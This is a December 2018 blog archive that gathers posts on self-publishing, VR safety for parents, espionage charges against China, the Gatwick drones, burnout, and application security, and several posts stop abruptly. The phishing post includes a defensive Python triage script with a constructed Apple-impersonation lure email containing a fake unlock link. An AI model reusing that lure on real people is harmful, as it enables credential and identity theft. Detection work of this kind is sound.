Monthly Archives: December 2018

Notes on Self-Publishing a Book


In this post I would like to share a few thoughts on self-publishing a book, in case anyone is considering that option.

As I mentioned in my post on burnout, one of my goals was to publish a book on a subject other than cyber security. A friend from my Krav Maga school, Anna Wonsley, learned that I had published several books, and asked if we might collaborate on a book about stretching. The timing was right, so I agreed.

I published my first book with Pearson and Addison-Wesley in 2004, and my last with No Starch in 2013. 14 years is an eternity in the publishing world, and even in the last 5 years the economics and structure of book publishing have changed quite a bit.

To better understand the changes, I had dinner with one of the finest technical authors around, Michael W. Lucas. We met prior to my interest in this book, because I had wondered about publishing books on my own. MWL started in traditional publishing like me, but has since become a full-time author and independent publisher. He explained the pros and cons of going it alone, which I carefully considered.

By the end of 2017, Anna and I were ready to begin work on the book. I believe our first "commits" occurred in December 2017.

For this stretching book project, I knew my strengths included organization, project management, writing to express another person's message, editing, and access to a skilled lead photographer. I learned that my co-author's strengths included subject matter expertise, a willingness to be photographed for the book's many pictures, and friends who would also be willing to be photographed.

None of us was very familiar with the process of transforming a raw manuscript and photos into a finished product. When I had published with Pearson and No Starch, they took care of that process, as well as copy-editing.

Beyond turning manuscript and photos into a book, I also had to identify a publication platform. Early on we decided to self-publish using one of the many newer companies offering that service. We wanted a company that could get our book into Amazon, and possibly physical book stores as well. We did not want to try working with a traditional publisher, as we felt that we could manage most aspects of the publishing process ourselves, and augment with specialized help where needed.

After a lot of research we chose Blurb. One of the most attractive aspects of Blurb was their expert ecosystem. We decided that we would hire one of these experts to handle the interior layout process. We contacted Jennifer Linney, who happened to be local and had experience publishing books to Amazon. We met in person, discussed the project, and agreed to move forward together.

I designed the structure of the book. As a former Air Force officer, I was comfortable with the "rule of threes," and brought some recent writing experience from my abandoned PhD thesis.

I designed the book to have an introduction, the main content, and a conclusion. Within the main content, the book featured an introduction and physical assessment, three main sections, and a conclusion. The three main sections consisted of a fundamental stretching routine, an advanced stretching routine, and a performance enhancement section -- something with Indian clubs, or kettle bells, or another supplement to stretching.

Anna designed all of the stretching routines and provided the vast majority of the content. She decided to focus on three physical problem areas -- tight hips, shoulders/back, and hamstrings. We encouraged the reader to "reach three goals" -- open your hips, expand your shoulders, and touch your toes. Anna designed exercises that worked in a progression through the body, incorporating her expertise as a certified trainer and professional martial arts instructor.

Initially we tried a process whereby she would write section drafts, and I would edit them, all using Google Docs. This did not work as well as we had hoped, and we spent a lot of time stalled in virtual collaboration.

By the spring of 2018 we decided to try meeting in person on a regular basis. Anna would explain her desired content for a section, and we would take draft photographs using iPhones to serve as placeholders and to test the feasibility of real content. We made a lot more progress using these methods, although we stalled again mid-year due to schedule conflicts.

By October our text was ready enough to try taking book-ready photographs. We bought photography lights from Amazon and used my renovated basement game room as a studio. We took pictures over three sessions, with Anna and her friend Josh as subjects. I spent several days editing the photos to prepare for publication, then handed the bundled manuscript and photographs to Jennifer for a light copy-edit and layout during November.

Our goal was to have the book published before the end of the year, and we met that goal. We decided to offer two versions. The first is a "collector's edition" featuring all color photographs, available exclusively via Blurb as Reach Your Goal: Collector's Edition. The second will be available at Amazon in January, and will feature black and white photographs.

While we were able to set the price of the book directly via Blurb, we could basically only suggest a price to Ingram and hence to Amazon. Ingram is the distributor that feeds Amazon and physical book stores. I am curious to see how the book will appear in those retail locations, and how much it will cost readers. We tried to price it competitively with older stretching books of similar size. (Ours is 176 pages with over 200 photographs.)

Without revealing too much of the economic structure, I can say that it's much cheaper to sell directly from Blurb. Their cost structure allows us to price the full color edition competitively. However, one of our goals was to provide our book through Amazon, and to keep the price reasonable we had to sell the black and white edition outside of Blurb.

Overall I am very pleased with the writing process, and exceptionally happy with the book itself. The color edition is gorgeous and the black and white version is awesome too.

The only change I would have made to the writing process would have been to start the in-person collaboration from the beginning. Working together in person accelerated the transfer of ideas to paper and played to our individual strengths of Anna as subject matter expert and me as a writer.

In general, I would not recommend self-publishing if you are not a strong writer. If writing is not your forte, then I highly suggest you work with a traditional publisher, or contract with an editor. I have seen too many self-published books that read terribly. This usually happens when the author is a subject matter expert, but has trouble expressing ideas in written form.

The bottom line is that it's never been easier to make your dream of writing a book come true. There are options for everyone, and you can leverage them to create wonderful products that scale with demand and can really help your audience reach their goals!

If you want to start the new year with better flexibility and fitness, consider taking a look at our book on Blurb! When the Amazon edition is available I will update this post with a link.

Update: Here is the Amazon listing.

Cross-posted from Rejoining the Tao Blog.

Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality


Virtual and Augmented reality technology is changing the way we see the world.

You’ve probably heard the buzz around Virtual Reality (VR) and Augmented Reality (AR) and your child may have even put VR gear on this year’s wish list. But what’s the buzz all about and what exactly do parents need to know about these mind-bending technologies?

VR and AR technology sound a bit sci-fi and intimidating, right? They can be until you begin to understand the amazing ways these technologies are being applied to entertainment as well as other areas like education and healthcare. But, like any new technology, where there’s incredible opportunity there are also safety issues parents don’t want to ignore.

According to a report from Common Sense Media, 60 percent of parents are worried about VR’s health effects on children, while others say the technology will have significant educational benefits.

Virtual Reality

Adults and kids alike are using VR technology — headsets, software, and games — to experience the thrill of being in an immersive environment.

The Pokemon Go app uses AR technology to overlay characters on an existing environment.

According to Consumer Technology Association’s (CTA) 20th Annual Consumer Technology Ownership and Market Potential Study, there are now 7 million VR headsets in U.S. households, which equates to about six percent of homes. CTA estimates that 3.9 million VR/AR headsets shipped in 2017 and 4.9 million headsets will ship in 2018.

With VR technology, a user wears a VR Head Mounted Display (HMD) headset and interacts with 3D computer-generated environments rendered on either a PC or a smartphone, which lets the user feel, or experience the illusion, that he or she is actually in that place. The VR headset has a display (OLED) for each eye, and each shows the environment from a slightly different angle to give the perception of depth. VR environments are diverse. One might involve going inside the human body to learn about the digestive system, another might be a battlefield, while another might be a serene ocean view. The list of games, apps, experiences, and movies goes on and on.

Augmented Reality

AR differs from VR in that it overlays digital information onto physical surroundings and does not require a headset. AR is transparent and allows you to see and interact with your environment. It adds digital images and data to enhance views of the real world. AR is used in apps like Pokémon Go and in GPS and walking apps that allow you to see your environment in real time. Not as immersive as VR, AR can still enrich a physical reality and is finding its way into a number of industries. VR and AR technologies are used in education for e-learning and in the military for combat, medic, and flight simulation training. The list of AR applications continues to grow.

To support these growing technologies, there are thousands of games, videos, live music and events available. Museums and arcades exist and theme parks are adapting thrill rides to meet the demand for VR experiences. Increasingly retailers are hopping on board to use VR to engage customers, which will be a hot topic at the upcoming 2019 Consumer Electronics Show (CES) in Las Vegas.

Still, there are questions from parents, such as what effect these immersive technologies will have on children’s brains, and whether VR environments blur the line between reality and fantasy enough to change a child’s behavior. The answer: At this point, not a lot is known about VR’s effect on children, but medical opinions are emerging warning of potential health impacts. So, calling a family huddle on the topic is a good idea if you have these technologies in your home or plan to in the near future.

VR/AR talking points for families

Apply safety features. VR apps and games include safety features such as restricted chat and privacy settings that allow users to filter out crude language and report abusive behavior. While some VR environments have moderators in place, some do not. This is also a great time to discuss password safety and privacy with your kids.

The best way to understand VR? Jump in the fun alongside your kids.

Age ratings and reviews. Some VR apps or games contain violence so pay attention to age restrictions. Also, be sure to read the reviews of the game to determine the safety, quality, and value of the VR/AR content.

Inappropriate content. While fun, harmless games and apps exist, so too does sexual content that kids can and do seek out. Be aware of how your child is using his or her VR headset and what content they are engaged with. Always monitor your child’s tech choices.

Isolation. A big concern with VR’s immersive structure is that players can and do become isolated in a VR world and, like with any fun technology, casual can turn addictive. Time limits on VR games and monitoring are recommended.

Physical safety/health. Because games are immersive, VR players can fall or hurt themselves or others while playing. To be safe, sit down while playing, don’t play in a crowded space, and remove pets from the playing area.

In addition to physical safety, doctors have expressed VR-related health concerns. Some warn about brain and eye development in kids related to VR technology. Because of the brain-eye connection of VR, players are warned about dizziness, nausea, and anxiety related to prolonged play in a VR environment.

Doctors recommend adult supervision at all times and keeping VR sessions short to give the eyes, brain, and emotions a rest. The younger the child, the shorter the exposure should be.

Be a good VR citizen. Being a good digital citizen extends to the VR world. When playing multi-player VR games, be respectful, kind, and remember there are real hearts behind those avatars. Also, be mindful of the image your own avatar is communicating. Be aware of bullies and bullying behavior in a virtual world where the lines between reality and fantasy can get blurred.

Get in the game. If you allow your kids to play VR games, get immersed in the game with them. Understand the environments, the community, the feeling of the game, and the safety risks first hand. A good rule: If you don’t want your child to experience something in the real world — violence, cursing, fear, anxiety — don’t let them experience it in a virtual world.

To get an insider’s view of what a VR environment is like and to learn more about potential security risks, check out McAfee’s podcast Hackable?, episode #18, Virtually Vulnerable.

The post Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality appeared first on McAfee Blogs.

McAfee 2018: Year in Review

2018 was an eventful year for all of us at McAfee. It was full of discovery, innovation, and progress—and we’re thrilled to have seen it all come to fruition. Before we look ahead to what’s in the pipeline for 2019, let’s take a look back at all the progress we’ve made this year and see how McAfee events, discoveries, and product announcements have affected, educated, and assisted users and enterprises everywhere.

MPOWERing Security Professionals Around the World

Every year, security experts gather at MPOWER Cybersecurity Summit to strategize, network, and learn about innovative ways to ward off advanced cyberattacks. This year was no different, as innovation was everywhere at MPOWER Americas, APAC, Japan, and EMEA. At the Americas event, we hosted Partner Summit, where head of channel sales and operations for the Americas, Ken McCray, discussed the program, products, and corporate strategy. Partners had the opportunity to dig deeper into this information through several Q&A sessions throughout the day. MPOWER Americas also featured groundbreaking announcements, including McAfee CEO Chris Young’s announcement of the latest additions to the MVISION product family: MVISION® Endpoint Detection and Response (MVISION EDR) and MVISION® Cloud.

ATR Analysis

This year was a prolific one, especially for our Advanced Threat Research team, which unveiled discovery after discovery about the threat landscape, from ‘Operation Oceansalt’ delivering five distinct waves of attacks on victims, to Triton malware spearheading the latest attacks on industrial systems, to GandCrab ransomware evolving rapidly, to the Cortana vulnerability. These discoveries not only taught us about cybercriminal techniques and intentions, but they also helped us prepare ourselves for potential threats in 2019.

Progress via Products

2018 wouldn’t be complete without a plethora of product updates and announcements, all designed to help organizations secure crucial data. This year, we were proud to announce McAfee MVISION®, a collection of products designed to support native security controls and third-party technologies.

McAfee MVISION® Endpoint orchestrates the native security controls in Windows 10 with targeted advanced threat defenses in a unified management workflow to visualize and investigate threats, understand compliance, and pivot to action. McAfee MVISION® Mobile protects against threats on Android and iOS devices. McAfee MVISION® ePO, a SaaS service, is designed to eliminate complexity by elevating management above the specific threat defense technologies with simple, intuitive workflows for security threat and compliance control across devices.

Beyond that, many McAfee products were updated to help security teams everywhere adapt to the ever-evolving threat landscape, and some even took home awards for their excellence.

All in all, 2018 was a great year. But, as always with cybersecurity, there’s still work to do, and we’re excited to work together to create a secure 2019 for everyone.

To learn more about McAfee, be sure to follow us at @McAfee and @McAfee_Business.

The post McAfee 2018: Year in Review appeared first on McAfee Blogs.

AI’s dark secret? A desire for data without bounds

AI offers the potential to help humankind in many ways. Driverless cars and smart infrastructure hold the promise to reduce congestion by facilitating the movement of people through cities. Improved diagnosis and treatments are increasing lifespans. In the enterprise, AI can help improve hiring decisions, make the factory floor safer, automate routine tasks, produce more objective performance reviews, and help organizations understand their customers.

New tools are appearing frequently. Amazon has been granted two patents for a wrist band that tracks workers’ hand movements as they pack boxes while filling orders. The wrist bands use radio frequency to track hand movement so precisely that the bands vibrate to nudge the hands in the proper direction when inefficient movements are detected. Humanyze sells sociometric badges that track employee movement through offices to provide insights regarding the quality of interactions with colleagues. L’Oréal’s UV Sense tracks the wearer’s exposure to ultraviolet rays then transfers the data to the user’s mobile phone. Cogito monitors the empathy displayed by customer service representatives handling calls.


The #1 Gift Parents Can Give Their Kids This Christmas

You won’t see this gift making the morning shows as being among the top hot gifts of 2018. It won’t make your child’s wish list, and you definitely won’t have to fight through mall crowds to try to find it.

Even so, it is one of the most meaningful gifts you can give your child this year. It’s the gift of your time.

If we are honest, as parents, we know we need to be giving more of this gift every day. We know in our parenting “knower” that if we were to calculate the time we spend on our phones, it would add up to days — precious days — that we could be spending with our kids.

So this holiday season, consider putting aside your phone and leaning into your family connections. Try leaving your phone in a drawer or in another room. And, if you pick it up to snap a few pictures, return it to its hiding place and reconnect to the moment.

This truism from researchers is worth repeating: Too much screen time can chip away at our relationships. And for kids? We’ve learned too much tech can lead to poor grades, anxiety, obesity, and worse — feelings of hopelessness and depression.

Putting the oodles of knowledge we now have into action and transforming the family dynamic is also one of the most priceless gifts you can give yourself this year.

Here are a few ideas to inspire you forward:

  1. Take time seriously. What if we took quality time with family as seriously as we do other things? What if we booked time with our family and refused to cancel it? It’s likely our dearest relationships would soon reflect the shift. Get intentional by carving out time. Things that are important end up on the calendar, so plan time together by booking it on the family calendar. Schedule time to play, make a meal together, do a family project, or hang out and talk.
  2. Green time over screen time. Sure it’s fun to have family movie marathons over the break but make sure you get your green time in. Because screen time can physically deplete our senses, green time — time spent outdoors — can be a great way to increase quality time with your family and get a hefty dose of Vitamin D.
  3. Aim for balance. The secret sauce of making any kind of change is balance. If there’s too much attention toward technology this holiday (yours or theirs), try a tech-exchange by trading a half-day of tech use for a half-day hike or bike ride, an hour of video games for an hour of family time. Balance wins every time, especially when quality time is the goal.
  4. Balance new gadget use. Be it a first smartphone, a new video game, or any other new tech gadget, let your kids have fun but don’t allow them to isolate and pull away from family. Balance screen time with face-to-face time with family and friends to get the most out of the holidays. Better yet: Join them in their world — grab a controller and play a few video games or challenge them to a few Fortnite battles.
  5. Be okay with the mess. When you are a parent, you know better than most how quickly the days, months, and years can slip by until — poof! — the kids are grown and gone. The next time you want to spend a full Saturday on chores, think about stepping over the mess and getting out of the house for some fun with your kids.

Here’s hoping you and your family have a magical holiday season brimming with quality time, laughter, and beautiful memories — together.

The post The #1 Gift Parents Can Give Their Kids This Christmas appeared first on McAfee Blogs.

CYBER ESPIONAGE ACCUSATIONS AGAINST CHINA

IN BRIEF: Australia, the United States and the United Kingdom have accused China of engaging in cyber espionage against their nations and friendly nations – accusations which describe China as being involved in the theft of confidential commercial information belonging to governments and technology companies.
---------------------------
I have explained several times the new and dangerous direction of cybercrime, where I warned about cyber warfare (Cyber Warfare) and cyber espionage (Cyber Espionage), areas in which the major powers are now investing more heavily, using technology to harm and interfere with other nations online.

China's APT-10 group has been accused by the United Kingdom and the United States of breaking into approximately 45 technology companies, the records of approximately one hundred thousand members of the US Navy, and various computers belonging to NASA.

Zhu Hua and Zhang Shilong, who are Chinese citizens, have been charged by the United States with carrying out cyber attacks on behalf of the Chinese Ministry of State Security – US Deputy Attorney General Rod Rosenstein described the charges.

China has denied the accusations made against it by the United States and the United Kingdom, while demanding that the United States release its two citizens – the effects of the alleged activity are said to have reached approximately 12 other countries, including Brazil, Japan, France, Canada and others.

Moreover, there have been accusations like these from one nation against another, with countries such as Russia, North Korea, the United States, the United Kingdom and China most often named as engaging in cyber espionage – while those nations are seen to be strengthening themselves and building a large capacity to carry out cyber attacks against other nations.

Alongside this, we have seen major growth in companies offering cybercrime services such as “Malware-as-a-service”, “Ransomware-as-a-service” and “Cyberattacks on demand”, which has caused cybercrime to continue gaining momentum in many parts of the world.

Recently, the US investigative agency (FBI) shut down several companies involved in providing cyber attack services to their customers.

The FBI has stated that the companies that were shut down had been involved in services used to attack financial institutions, schools, government agencies, internet service providers and so on.

critical-boot.com, ragebooter.com, downthem.org, and quantumstress.net are just some of those hit by the wave of shutdowns carried out by the US investigative agency (FBI) after a major operation against companies involved in cybercrime services.

Moreover, during this end-of-year holiday period, statistics have shown cybercrime growing rapidly, and we have witnessed many cybercrime incidents leading to major losses of money and personal information for individuals and various companies.

Taking an example from our East African nations, in Kenya, according to statistics released by the “Communications Authority of Kenya (CA)”, more than 3.8 million cybercrime incidents were identified in a period of just three months. Detailed information on this has been published by Kenya's "STANDARD MEDIA".

Let me use this opportunity to advise greater care when using networks, especially online banking services, and to strengthen the protection of our network systems in order to reduce the scale of the problem.

Rogue Drones Cause Gatwick Airport to Close for Over 30 Hours: More on This Threat

As the Internet of Things works its way into almost every facet of our daily lives, it becomes more important to safeguard the IoT devices we bring into our homes. One device that has become increasingly popular among consumers is the drone. These remote-controlled quadcopters have enhanced the work of photographers and given technology buffs a new hobby, but what happens when these flying robots cause a safety hazard for others? That’s exactly what happened at the Gatwick airport on Wednesday night and again today when two drones were spotted flying over the airfield, causing all departing flights to remain grounded and all arriving flights to be diverted to other airports.

The drones were spotted flying over the Gatwick airport’s perimeter fence into the area where the runway operates from. This disruption affected 10,000 passengers on Wednesday night, 110,000 passengers on Thursday, and 760 flights expected to arrive and depart on Thursday. More than 20 police units were recruited to find the drone’s operator so the device could be disabled. The airport closure resulted in 31.9 hours with no planes taking off or landing between Wednesday and Thursday.

You might be wondering, how could two drones cause an entire airport to shut down for so long? It turns out that drones can cause serious damage to an aircraft. Evidence suggests that drones could inflict more damage than a bird collision and that the lithium-ion batteries that power drones could become lodged in airframes, potentially starting a fire. And while the probability of a collision is small, a drone could still be drawn into an aircraft turbine, putting everyone on board at risk. This is why it’s illegal to fly a drone within one kilometer of an airport or airfield boundary. What’s more, endangering the safety of an aircraft is a criminal offense that could result in a five-year prison sentence.

Now, this is a lesson for all drone owners everywhere to be cognizant of where they fly their devices. But beyond the physical implications that are associated with these devices, there are digital ones too, given they’re internet-connected. In fact, to learn about how vulnerable these devices can be, you can give our latest episode of “Hackable?” a listen, which explores the physical and digital implications of compromised drones.

Therefore, if you get a drone for Christmas this year, remember to follow these cybersecurity tips to ensure you protect them on the digital front.

  • Do your research. There are multiple online communities that disclose bugs and potential vulnerabilities as well as new security patches for different types of drones. Make sure you stay informed to help you avoid potential hacks.
  • Update, update, update! Just as it’s important to update your apps and mobile devices, it’s also important to update the firmware and software for your drone. Always verify the latest updates with your drone manufacturer’s website to make sure it is legitimate.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Rogue Drones Cause Gatwick Airport to Close for Over 30 Hours: More on This Threat appeared first on McAfee Blogs.

Managing Burnout

This is not strictly an information security post, but the topic likely affects a decent proportion of my readership.

Within the last few years I experienced a profound professional "burnout." I've privately mentioned this to colleagues in the industry, and heard similar stories or requests for advice on how to handle burnout.

I want to share my story in the hopes that it helps others in the security scene, either by coping with existing burnout or preparing for a possible burnout.

How did burnout manifest for me? It began with FireEye's acquisition of Mandiant, almost exactly five years ago. 2013 was a big year for Mandiant, starting with the APT1 report in early 2013 and concluding with the acquisition in December.

The prospect of becoming part of a Silicon Valley software company initially seemed exciting, because we would presumably have greater resources to battle intruders. Soon, however, I found myself at odds with FireEye's culture and managerial habits, and I wondered what I was doing inside such a different company.

(It's important to note that the appointment of Kevin Mandia as CEO in June 2016 began a cultural and managerial shift. I give Kevin and his lieutenants credit for helping transform the company since then. Kevin's appointment was too late for me, but I applaud the work he has done over the last few years.)

Starting in late 2014 and progressing in 2015, I became less interested in security. I was aggravated every time I saw the same old topics arise in social or public media. I did not see the point of continuing to debate issues which were never solved. I was demoralized and frustrated.

At this time I was also working on my PhD with King's College London. I had added this stress myself, but I felt like I could manage it. I had earned two major and two minor degrees in four years as an Air Force Academy cadet. Surely I could write a thesis!

Late in 2015 I realized that I needed to balance the very cerebral art of information security with a more physical activity. I took a Krav Maga class the first week of January 2016. It was invigorating and I began a new blog, Rejoining the Tao, that month. I began to consider options outside of information security.

In early 2016 my wife began considering ways to rejoin the W-2 workforce, after having stayed home with our kids for 12 years. We discussed the possibility of me leaving my W-2 job and taking a primary role with the kids. By mid-2016 she had a new job and I was open to departing FireEye.

By late 2016 I also realized that I was not cut out to be a PhD candidate. Although I had written several books, I did not have the right mindset or attitude to continue writing my thesis. After two years I quit my PhD program. This was the first time I had quit anything significant in my life, and it was the right decision for me. (The Churchill "never, never, never give up" speech is fine advice when defending your nation's existence, but it's stupid advice if you're not happy with the path you're following.)

In March 2017 I posted Bejtlich Moves On, where I said I was leaving FireEye. I would offer security consulting in the short term, and would open a Krav Maga school in the long term. This was my break with the security community and I was happy to make it. I blogged on security only five more times in 2017.

(Incidentally, one very public metric for my burnout experience can be seen in my blog output. In 2015 I posted 55 articles, but in 2016 I posted only 8, and slightly more, 12, in 2017. This is my 21st post of 2018.)

I basically took a year off from information security. I did some limited consulting, but Mrs B paid the bills, with some support from my book royalties and consulting. This break had a very positive effect on my mental health. I stayed aware of security developments through Twitter, but I refused to speak to reporters and did not entertain job offers.

During this period I decided that I did not want to open a Krav Maga school and quit my school's instructor development program. For the second time, I had quit something I had once considered very important.

I started a new project, though -- writing a book that had nothing to do with information security. I will post about it shortly, as I am finalizing the cover with the layout team this weekend!

By the spring of 2018 I was able to consider returning to security. In May I blogged that I was joining Splunk, but that lasted only two months. I realized I had walked into another cultural and managerial mismatch. Near the end of that period, Seth Hall from Corelight contacted me, and by July 20th I was working there. We kept it quiet until September. I have been very happy at Corelight, finally finding an environment that matches my temperament, values, and interests.

My advice to those of you who have made it this far:

If you're feeling burnout now, you're not alone. It happens. We work in a stressful industry that will take everything that you can give, and then try to take more. It's healthy and beneficial to push back. If you can, take a break, even if it means only a partial break.

Even if you can't take a break, consider integrating non-security activities into your lifestyle -- the more physical, the better. Security is a very cerebral activity, often performed in a sedentary manner. You have a body and taking care of it will make your mind happier too.

If you're not feeling burnout now, I recommend preparing for a possible burnout in the future. In addition to the advice in the previous paragraphs, take steps now to be able to completely step away from security for a defined period. Save a proportion of your income to pay your bills when you're not working in security. I recommend at least a month, but up to six months if you can manage it.

This is good financial advice anyway, in the event you were to lose your job. This is not an emergency fund, though -- this is a planned reprieve from burnout. We are blessed in security to make above-average salaries, so I suggest saving for retirement, saving for layoffs, and saving for burnout.

Finally, it's ok to talk to other people about this. This will likely be a private conversation. I don't see too many people saying "I'm burned out!" on Twitter or in a blog post. I only felt comfortable writing this post months after I returned to regular security work.

I'm very interested in hearing what others have to say on this topic. Replying to my Twitter announcement for the blog post is probably the easiest step. I moderate the comments here and might not get to them in a timely manner.

Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat

With the holidays rapidly approaching, many consumers are receiving order confirmation emails updating them on their online purchases for friends and family. What they don’t expect to see is an email that appears to be a purchase confirmation from the Apple App Store containing a PDF attachment of a receipt for a $30 app. This is actually a stealthy phishing email, which has been circulating the internet, prompting users to click on a link if the transaction was unauthorized.

So how exactly does this phishing campaign work? In this case, the cybercriminals rely on the victim to be thrown off by the email stating that they purchased an app when they know that they didn’t. When the user clicks on the link in the receipt stating that the transaction was unauthorized, they are redirected to a page that looks almost identical to Apple’s legitimate Apple Account management portal. The user is prompted to enter their login credentials, only to receive a message claiming that their account has been locked for security reasons. If the user attempts to unlock their account, they are directed to a page prompting them to fill out personal details including their name, date of birth, and social security number for “account verification.”

Once the victim enters their personal and financial information, they are directed to a temporary page stating that they have been logged out to restore access to their account. The user is then directed to the legitimate Apple ID account management site, stating “this session was timed out for your security,” which only helps this attack seem extra convincing. The victim is led to believe that this process was completely normal, while the cybercriminals now have enough information to perform complete identity theft.

Although this attack does have some sneaky behaviors, there are a number of steps users can take to protect themselves from phishing scams like this one:

  • Be wary of suspicious emails. If you receive an email from an unknown source or notice that the “from” address itself seems peculiar, avoid interacting with the message altogether.
  • Go directly to the source. Be skeptical of emails claiming to be from companies asking to confirm a purchase that you don’t recognize. Instead of clicking on a link within the email, it’s best to go straight to the company’s website to check the status of your account or contact customer service.
  • Use a comprehensive security solution. It can be difficult to determine if a website, link, or file is risky or contains malicious content. Add an extra layer of security with a product like McAfee Total Protection.
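The two email signals the tips above describe (a "from" address that does not belong to the claimed brand, and a link that leads away from the company's real site) can be checked mechanically. The following is an added example, not code from the McAfee post: it parses a constructed message modelled on the App Store receipt described above and reports both signals. The list of legitimate brand domains, the brand keyword, and the sample message are assumptions made for this illustration.

```python
"""Triage checks for a brand-impersonation phishing email (added example).

Parses a constructed message and flags (1) a sender mailbox whose domain does
not belong to the brand named in the display name and (2) links whose host is
not one of the brand's real domains. Domains and sample are assumptions.
"""
from email import policy
from email.parser import BytesParser
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed (illustrative) list of domains the impersonated brand really uses.
LEGITIMATE_DOMAINS = {"apple.com", "itunes.com"}

# Constructed sample: the display name says Apple, the mailbox and link do not.
SAMPLE_EMAIL = b"""From: "Apple App Store" <receipts@appstore-billing-notice.example>
To: victim@example.org
Subject: Your receipt from Apple
Content-Type: text/html; charset="utf-8"

<html><body>
<p>You purchased an app for $30.00.</p>
<p>If you did not authorize this transaction,
<a href="http://appleid-verify.example/unlock?session=1">cancel it here</a>.</p>
</body></html>
"""


class _LinkCollector(HTMLParser):
    """Collects href targets of <a> tags from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.links.append(value)


def _is_brand_domain(host, brand_domains):
    """True if host is one of the brand domains or a subdomain of one."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in brand_domains)


def triage(raw_message, brand_keyword="apple", brand_domains=LEGITIMATE_DOMAINS):
    """Return a list of human-readable findings; an empty list means no signal."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_message)
    findings = []

    # Signal 1: the sender's mailbox domain versus the brand it claims to be.
    sender = msg["From"]
    addr = sender.addresses[0] if sender is not None and sender.addresses else None
    if addr is not None:
        display = (addr.display_name or "").lower()
        if brand_keyword in display and not _is_brand_domain(addr.domain, brand_domains):
            findings.append(
                f"sender domain {addr.domain!r} does not belong to the claimed brand")

    # Signal 2: links that leave the brand's real sites.
    body = msg.get_body(preferencelist=("html", "plain"))
    if body is not None:
        collector = _LinkCollector()
        collector.feed(body.get_content())
        for link in collector.links:
            host = urlparse(link).hostname or ""
            if not _is_brand_domain(host, brand_domains):
                findings.append(f"link {link!r} points to {host!r}, not a brand domain")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EMAIL):
        print("FINDING:", finding)
```

The check deliberately stays on header and link data; it does not open the PDF attachment, so it is safe to run in a mail-filtering pipeline before any content is rendered.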

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat appeared first on McAfee Blogs.

Carnegie Mellon’s Software Engineering Institute Report Shows Efficacy of Static Application Security Testing

A new report from Carnegie Mellon University’s Software Engineering Institute shows that automated, integrated Static Analysis improves software quality, reduces development time, and makes software more reliable and secure. By incorporating application security testing throughout the entirety of the Software Development Lifecycle (SDLC), organizations are able to ensure the security and quality of their software and increase speed-to-market.

The findings stand in support of what our own data and customer practices have shown. In the State of Software Security Volume 9, analysis of Veracode’s application testing data found that development teams that implemented DevSecOps practices fixed flaws 11.5 times faster than typical organizations. While Nichols’ report does not include vendor comparisons, it does provide an overall analysis on the total benefits of a secure development approach. 

Development teams at three organizations were observed, with each team using both static code analysis (SCA) and static binary analysis (SBA). The teams each used these software development tools at different times in the SDLC, across multiple and varying projects. The study found that applying the tools added no additional effort for development teams prior to release, and that as developers sharpened secure coding skills, false positive rates declined with cleaner code. It further recommends that organizations build and automate static testing into their workflows across the SDLC, and that they continue to apply human analysis to testing results to ensure quality.

Three Must-Have Solutions to Kick-Off Your Application Security Program

Building and maturing an application security program might seem like a daunting project, but getting started is simpler than you think. There is an established series of steps most organizations take when developing their programs. Here are the three solutions we recommend to get you started in securing your business-critical applications:

1. Veracode Greenlight: Deliver applications faster and meet your development timelines by writing secure code the first time around. Veracode Greenlight, an IDE or CI integrated continuous flaw feedback and secure coding education solution, returns scans in seconds, which helps developers discern whether their code is secure. This solution helps teams maintain development velocity, reduce the number of flaws introduced into an application, and strengthens secure coding skills and practices. Learn more.

2. Static Analysis: Veracode static analysis enables you to quickly identify and remediate application security flaws at scale and with efficiency. Our SaaS-based platform integrates with development and security tools to make testing a seamless part of your process. Once flaws are identified, teams can leverage in-line remediation advice and one-to-one coaching to reduce mean time to resolve. Learn more.

3. Software Composition Analysis: While the report found that SAST wasn’t the strongest solution to reducing the risk of open source components, modern software composition analysis is. Today, applications are more often assembled from other sources, and in a typical application, we’re seeing some comprised of up to 90 percent third-party code. Veracode’s SCA uses real machine learning and natural language processing to identify potential vulnerabilities in open source libraries with a high level of accuracy. By understanding the status of the components within an application, and if a vulnerable method is being called, organizations can prioritize fixes based on the riskiest use of components and maintain their speed-to-market. Learn more.

Applications continue to be one of the top attack vectors for malicious actors, and while there is no application security silver bullet, we can help you implement automated techniques and manual processes to ensure that your applications are secure. To start creating more secure software today and learn more about how our solutions can help drive down application risk in your organization, contact us.

Flaws and Vulnerabilities and Exploits – Oh My!

With the slew of terms that exist in the world of application security, it can be difficult to keep them all straight. “Flaws,” “vulnerabilities,” and “exploits” are just a few that are likely on your radar, but what do they mean? If you’ve used these words interchangeably in the past, you’re not alone. They’re easy to confuse with one another, likely because there’s a relationship between all of these terms; however, their distinction is real.

To give you a better idea of how to distinguish between these security issues and the different roles that they play within AppSec, let’s take a closer look at the similarities and differences between flaws, vulnerabilities, and exploits.

Flaws vs. Vulnerabilities

Flaws and vulnerabilities are perhaps the easiest two security defects to mix up, leading many security professionals to wonder what exactly is the difference between the two.

To put it simply, a flaw is an implementation defect that can lead to a vulnerability, and a vulnerability is an exploitable condition within your code, one that an attacker can actually take advantage of. So, just because a flaw isn’t a vulnerability at the present moment, it doesn’t mean that it can’t become one in the future as environments and architectures change or get updated. Any updates to the architecture or changes in the function of your application can expose your application to attacks that were previously hidden.

Once someone has figured out a way to attack – or exploit – a flaw, the flaw becomes a vulnerability. If you’re still confused, think of it this way: all vulnerabilities are flaws, but not all flaws are vulnerabilities. All flaws have the potential to become vulnerabilities.

